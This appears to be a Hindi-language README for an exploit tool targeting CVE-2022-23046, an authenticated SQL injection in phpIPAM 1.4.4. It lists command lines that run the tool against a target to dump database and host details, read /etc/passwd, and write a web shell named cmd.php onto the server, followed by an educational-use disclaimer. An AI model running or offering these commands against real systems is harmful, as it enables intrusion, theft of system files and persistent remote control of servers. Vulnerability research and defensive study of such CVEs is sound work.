
CVE-2022-23046 phpIPAM 1.4.4
phpIPAM v1.4.4 एक प्रमाणित एडमिन उपयोगकर्ता को subnet पैरामीटर में SQL वाक्य इंजेक्ट करने की अनुमति देता है, जब app/admin/routing/edit-bgp-mapping-search.php के माध्यम से subnet खोज रहे हो। यह प्रोजेक्ट वर्तमान में डेटाबेस जानकारी और होस्ट संस्करण जानकारी प्रिंट करता है। यह फ़ाइलें पढ़ने और सर्वर पर लिखने का भी प्रयास कर सकता है।
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -f /etc/passwd
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -w /var/www/html/cmd.php
सहायता मेनू के लिए
python3 phpipam_1.4.4.py -h
इस रिपॉजिटरी पर प्रदान किया गया सारा कोड केवल शैक्षिक/अनुसंधान उद्देश्यों के लिए है। इस रिपॉजिटरी में निहित सामग्री से संबंधित कोई भी कार्रवाई और/या गतिविधियाँ पूरी तरह से आपकी जिम्मेदारी हैं। इस रिपॉजिटरी में कोड के दुरुपयोग के परिणामस्वरूप संबंधित व्यक्तियों के खिलाफ आपराधिक आरोप लगाए जा सकते हैं। लेखक उस स्थिति में जिम्मेदार नहीं होंगे जहां कानून तोड़ने के लिए इस रिपॉजिटरी में कोड का दुरुपयोग करने वाले किसी भी व्यक्ति के खिलाफ कोई आपराधिक आरोप लगाए जाएं।